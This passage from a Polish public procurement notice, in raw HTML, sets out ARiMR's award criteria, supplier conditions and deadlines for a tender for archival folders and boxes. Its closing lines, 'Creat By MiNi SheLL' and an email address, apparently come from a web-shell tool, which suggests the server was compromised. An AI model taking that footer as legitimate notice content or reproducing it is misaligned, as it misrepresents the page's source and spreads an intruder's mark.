przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym dokumentach zamówienia i zostanie oceniona jako najkorzystniejsza w oparciu o podane poniżej kryteria wyboru:<br/><br/>1)	kryterium „cena oferty” – C – waga kryterium 60%<br/>W ramach kryterium „cena oferty” (C) oceniana będzie najniższa łączna cena oferty brutto za realizację całości zamówienia podana w Formularzu Ofertowym. Ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C = Cn/Co x 60 pkt<br/>gdzie:<br/>C – liczba punktów przyznanych ofercie w kryterium łączna cena oferty brutto (liczona z dokładnością do dwóch miejsc po przecinku)<br/>Cn – najniższa łączna cena oferty brutto za realizację zamówienia spośród ofert nieodrzuconych,<br/>Co – cena oferty badanej brutto za realizację zamówienia.<br/>W kryterium „cena oferty” Wykonawca może otrzymać maksymalnie 60 punktów.<br/><br/>2)	kryterium „termin realizacji zamówienia” – T – waga kryterium 40%<br/>W ramach kryterium „termin realizacji zamówienia” (T) oceniany będzie termin realizacji zamówienia wskazany przez Wykonawcę w Formularzu Ofertowym. Ocena zostanie dokonana wg poniższych zasad:<br/><br/>termin realizacji zamówienia – od 15 do 21 dni od dnia zawarcia umowy – 0 pkt,<br/>termin realizacji zamówienia – od 11 do 14 dni od dnia zawarcia umowy – 20 pkt,<br/>termin realizacji zamówienia – od 1 do 10 dni od dnia zawarcia umowy – 40 pkt.<br/><br/>W kryterium „termin realizacji zamówienia” Wykonawca może otrzymać maksymalnie 40 punktów.<br/><br/>2.	Łączna liczba punktów uzyskanych przez Wykonawcę zostanie wyliczona na podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej, zgodnie ze wzorem:<br/>P = C + T<br/>gdzie:<br/>P – liczba punktów przyznana ofercie (liczona z dokładnością do dwóch miejsc po przecinku). Zasada zaokrąglania – poniżej 5 należy końcówkę pominąć, 5 i powyżej 5 należy zaokrąglić w górę.<br/>C – liczba punktów przyznanych ofercie w kryterium „cena oferty”,<br/>T – liczba punktów przyznanych ofercie w kryterium „termin realizacji zamówienia”<br/><br/>3.	Oferta Wykonawcy może uzyskać maksymalnie 100 punktów.<br/>4.	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty, które przedstawiają taki sam bilans ceny i innych kryteriów oceny ofert, zastosowanie będą miały zapisy art. 248 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">wymagania dotyczące określonej etykiety, zgodnie z art. 104 ustawy - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa materiałów archiwizacyjnych na potrzeby Podlaskiego Oddziału Regionalnego ARiMR oraz podległych jednostek organizacyjnych na terenie województwa podlaskiego.<br/>2.	Szczegółowy opis przedmiotu zamówienia został zawarty w poniższym zestawieniu:<br/>Lp.	Nazwa towaru	Jednostka miary	Ilość<br/>1	Teczka archiwizacyjna wiązana A4, format na dokumenty A4, materiał: karton o gramaturze mieszczącej się w przedziale 300 - 350 g/m², wiązane tasiemki o długości co najmniej 200 mm, przymocowane w sposób trwały, grzbiet teczki oraz grzbiety zakładek bigowane co 5 mm - wymiary od 0 mm do 10 mm, posiadające trzy zakładki boczne chroniące dokumenty przed wypadnięciem, szerokość zakładek bocznych liczona od zagięcia ostatniego bigu powinna wynosić co najmniej 120 mm, wymiary zakładki bocznej dł. 320 mm x szer. 150 mm, wymiary zakładki górnej i dolnej dł. 150 mm x szer.160 mm, dostawa w formie złożonej przed bigiem.	sztuka	1370<br/>2	Teczka archiwizacyjna wiązana, format na dokumenty A4, materiał: karton o gramaturze mieszczącej się w przedziale 300 - 350 g/m², wiązane tasiemki o długości co najmniej 200 mm, przymocowane w sposób trwały, grzbiet teczki oraz grzbiety zakładek bigowane co 5 mm - wymiary od 0 mm do 20 mm, posiadające trzy zakładki boczne chroniące dokumenty przed wypadnięciem, szerokość zakładek bocznych liczona od zagięcia ostatniego bigu powinna wynosić co najmniej 120 mm, wymiary zakładki bocznej dł. 320 mm x szer. 150 mm, wymiary zakładki górnej i dolnej dł. 150 mm x szer.160 mm, dostawa w formie złożonej przed bigiem.	sztuka	3135<br/>3	Teczka archiwizacyjna wiązana, format na dokumenty A4, materiał: karton o gramaturze mieszczącej się w przedziale 350-400 g/m², wiązane tasiemki o długości co najmniej 200 mm, przymocowane w sposób trwały, grzbiet teczki oraz grzbiety zakładek bigowane co 10 mm - wymiary od 0 mm do 40 mm, posiadające trzy zakładki boczne chroniące dokumenty przed wypadnięciem, szerokość zakładek bocznych liczona od zagięcia ostatniego bigu powinna wynosić co najmniej 120 mm, wymiary zakładki bocznej dł. 320 mm x szer.140 mm, wymiary zakładki górnej i dolnej dł. 140 mm x szer.180 mm, dostawa w formie złożonej przed bigiem.	sztuka	3010<br/>4	Teczka archiwizacyjna wiązana, format na dokumenty A4, materiał: karton o gramaturze 400 g/m², wiązane tasiemki o długości co najmniej 200 mm, przymocowane w sposób trwały, grzbiet teczki oraz grzbiety zakładek bigowane co 10 mm - wymiary od 0 mm do 60 mm, posiadające trzy zakładki boczne chroniące dokumenty przed wypadnięciem, szerokość zakładek bocznych liczona od zagięcia ostatniego bigu powinna wynosić co najmniej 100 mm, wymiary zakładki bocznej dł. 320 mm x szer. 160 mm, wymiary zakładki górnej i dolnej dł. 160 mm x szer. 190 mm, dostawa w formie złożonej przed bigiem.	sztuka	7090<br/>5	Pudełka do dokumentów format A5, wykonane z kartonu. Wymiary: szerokość 110 mm, długość 300 mm, wysokość 160mm. Dostawa w formie złożonej z pokrywą zdejmowaną. Składane bez użycia taśmy i zszywek.	sztuka	315<br/>6	Pudełka do dokumentów - wykonane z kartonu, na dokumenty o formacie A6. Wymiary wewnętrzne: szerokość 160mm, długość 300 mm, wysokość 110mm. Dostawa w formie złożonej. Bez pokrywy. Składane bez użycia taśmy i zszywek.	sztuka	285<br/>7	Pudło archiwizacyjne -wykonane z kartonu na dokumenty o formacie A5. Wymiary wewnętrzne: szerokość 220mm, długość 300 mm, wysokość 160 mm. Dostawa w formie złożonej. Z pokrywą zdejmowaną. Składane bez użycia taśmy i zszywek.	sztuka	115<br/>8	Pudło archiwizacyjne -wykonane z twardej tektury falistej na dokumenty o formacie A4. Wymiary wewnętrzne: szerokość 100 mm x długość 323 mm, wysokość 264mm.Otwór ułatwiający wyjęcie pudełka. Dostawa w formie złożonej. Pokrywa/klapa połączona z pudełkiem na krawędzi o dł. 323 mm. Składane bez użycia taśmy i zszywek.	sztuka	1650<br/>9	Pudło archiwizacyjne na płyty CD-wykonane z twardej tektury falistej na dokumenty o formacie A6. Wymiary wewnętrzne: szerokość 130 mm x długość 340 mm, wysokość 130 mm. Otwór ułatwiający wyjęcie pudełka. Dostawa w formie złożonej. Pokrywa/klapa połączona z pudełkiem na krawędzi o dł. 340 mm. Składane bez użycia taśmy i zszywek. sztuka	165.<br/>3. Warunki wykonania zamówienia zostały opisane w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44617100-9 - Pudła kartonowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym dokumentach zamówienia i zostanie oceniona jako najkorzystniejsza w oparciu o podane poniżej kryteria wyboru:<br/><br/>1)	kryterium „cena oferty” – C – waga kryterium 60%<br/>W ramach kryterium „cena oferty” (C) oceniana będzie najniższa łączna cena oferty brutto za realizację całości zamówienia podana w Formularzu Ofertowym. Ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C = Cn/Co x 60 pkt<br/>gdzie:<br/>C – liczba punktów przyznanych ofercie w kryterium łączna cena oferty brutto (liczona z dokładnością do dwóch miejsc po przecinku)<br/>Cn – najniższa łączna cena oferty brutto za realizację zamówienia spośród ofert nieodrzuconych,<br/>Co – cena oferty badanej brutto za realizację zamówienia.<br/>W kryterium „cena oferty” Wykonawca może otrzymać maksymalnie 60 punktów.<br/><br/>2)	kryterium „termin realizacji zamówienia” – T – waga kryterium 40%<br/>W ramach kryterium „termin realizacji zamówienia” (T) oceniany będzie termin realizacji zamówienia wskazany przez Wykonawcę w Formularzu Ofertowym. Ocena zostanie dokonana wg poniższych zasad:<br/><br/>termin realizacji zamówienia – od 15 do 21 dni od dnia zawarcia umowy – 0 pkt,<br/>termin realizacji zamówienia – od 11 do 14 dni od dnia zawarcia umowy – 20 pkt,<br/>termin realizacji zamówienia – od 1 do 10 dni od dnia zawarcia umowy – 40 pkt.<br/><br/>W kryterium „termin realizacji zamówienia” Wykonawca może otrzymać maksymalnie 40 punktów.<br/><br/>2.	Łączna liczba punktów uzyskanych przez Wykonawcę zostanie wyliczona na podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej, zgodnie ze wzorem:<br/>P = C + T<br/>gdzie:<br/>P – liczba punktów przyznana ofercie (liczona z dokładnością do dwóch miejsc po przecinku). Zasada zaokrąglania – poniżej 5 należy końcówkę pominąć, 5 i powyżej 5 należy zaokrąglić w górę.<br/>C – liczba punktów przyznanych ofercie w kryterium „cena oferty”,<br/>T – liczba punktów przyznanych ofercie w kryterium „termin realizacji zamówienia”<br/><br/>3.	Oferta Wykonawcy może uzyskać maksymalnie 100 punktów.<br/>4.	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty, które przedstawiają taki sam bilans ceny i innych kryteriów oceny ofert, zastosowanie będą miały zapisy art. 248 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu na podstawie art. 108 ust. 1 Ustawy, z zastrzeżeniem art. 110 ust. 2-3 Ustawy,<br/>2)	nie podlegają wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r., poz. 1497 ze zm.)<br/>2.	Wykonawca jest zobowiązany wykazać niepodleganie wykluczeniu z postępowania i spełnianie warunków udziału w postępowaniu.<br/>3.	Ocena spełniania w/w zostanie dokonana w oparciu o informacje zawarte w przedłożonych przez Wykonawcę oświadczeniach lub dokumentach wyszczególnionych w rozdziale VI Specyfikacji. Z treści załączonych dokumentów musi wynikać, że Wykonawca w/w warunki spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) aktualne na dzień składania ofert Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania (Załącznik nr 2 do Specyfikacji),<br/><br/>Przed udzieleniem zamówienia Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia, za pośrednictwem Platformy Zakupowej, w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia podmiotowych środków dowodowych i dokumentów:<br/><br/>2)	na potwierdzenie braku podstawy wykluczenia o której mowa w art. 108 ust. 1 pkt 5) Ustawy – oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r o ochronie konkurencji i konsumentów (tj. Dz. U. z 2023 r., poz. 1689 ze zm.), z innym wykonawcą, który złożył odrębną ofertę w niniejszym postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w niniejszym postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik nr 5 do Specyfikacji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	aktualne na dzień składania ofert Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu (Załącznik nr 3 do Specyfikacji),<br/>2)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie wskazania, które dostawy wykonają poszczególni Wykonawcy (członkowie konsorcjum) – (Załącznik nr 4 do Specyfikacji),<br/>3)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy w szczególności w zakresie podpisania oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestrowym,<br/>4)	Zobowiązanie podmiotu trzeciego lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami, jeżeli Wykonawca powołuje się na zasoby innych podmiotów (Załącznik nr 6 do Specyfikacji).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku:<br/>1)	oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie,<br/>2)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi udokumentować, że nie podlega wykluczeniu z postępowania na podstawie przesłanek określonych w rozdziale VIII Specyfikacji, co oznacza, że każdy z Wykonawców składa oddzielnie oświadczenia stanowiące Załączniki nr 2 i 3 do Specyfikacji – zgodnie z art. 125 ust. 4 Ustawy,<br/>3)	muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – zgodnie z art. 58 ust. 2 Ustawy,<br/>4)	przed podpisaniem umowy przedłożą pełnomocnictwo do zawarcia umowy w sprawie zamówienia publicznego, jeżeli pełnomocnictwo takie nie zostało dołączone do oferty.<br/>2.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają świadczenia, do realizacji których te zdolności są wymagane. W takiej sytuacji, zgodnie z art. 117 ust. 4 Ustawy, Wykonawca składa wraz z ofertą oświadczenie w zakresie wskazania, które świadczenia wykonają poszczególni Wykonawcy (członkowie konsorcjum). Wzór oświadczenia stanowi Załącznik nr 4 do Specyfikacji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Oprócz zmian dopuszczalnych Ustawą (art. 455 Ustawy) Zamawiający przewiduje zmiany określone poniżej:<br/>1)	działanie siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami,<br/>2)	zmiana sposobu realizacji przedmiotu Umowy wynikającej ze zmian w obowiązujących przepisach prawa mających wpływ na realizację przedmiotu Umowy,<br/>3)	zmiany danych identyfikujących Strony Umowy,<br/>4)	zmian mających na celu doprecyzowanie zapisów w treści Umowy, jeśli będą budziły wątpliwości interpretacyjne między Stronami,<br/>2.	Zmiana Umowy nastąpi w formie pisemnego Aneksu do Umowy pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/arimr</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-30 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pozycja planu zamówień publicznych nr 1.2.24

Creat By MiNi SheLL
Email: jattceo@gmail.com